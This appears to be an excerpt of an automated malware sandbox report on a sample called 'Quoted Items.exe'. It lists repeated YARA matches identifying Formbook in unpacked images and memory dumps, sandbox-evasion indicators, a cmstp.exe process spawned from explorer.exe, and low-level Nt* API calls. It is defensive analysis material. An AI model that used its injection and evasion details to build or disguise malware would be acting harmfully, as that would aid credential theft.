          Source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quoted Items.exe.2fc435c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0.2.Quoted Items.exe.2fd9a34.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0.2.Quoted Items.exe.2fcd7e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Quoted Items.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quoted Items.exe.2fc435c.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0.2.Quoted Items.exe.2fd9a34.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0.2.Quoted Items.exe.2fcd7e8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_02D64360
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_02D640C0
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_02D640B0
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_07835AD8
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_078356A3
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_078356B0
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_07830400
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_078303F0
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_07836B98
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_07836BE0
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_07836BF0
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 0_2_07835AC8
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041BA9D
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_0041CB90
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00408C6B
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00408C70
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00402D87
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A2D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D0D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A1D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A25DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050ED5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519D466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051ADFCE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A1FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519D616
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F6E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05181EB6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DF900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F4120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051AE824
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA830
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EB090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051020A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A20A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A28EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FA309
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A2B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FAB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0517CB4F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FEB9A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510138B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051903DA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510ABD8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051823E3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0518FA2B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB236
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A22AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194AEF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DCCB90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DB8C70
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DB8C6B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DB2D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DB2D87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_00DB2FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 050DB150 appears 145 times
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_004186FA NtClose,
          Source: C:\Users\user\Desktop\Quoted Items.exeCode function: 4_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0511AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0511A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0511A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05119610 NtEnumerateValueKey,
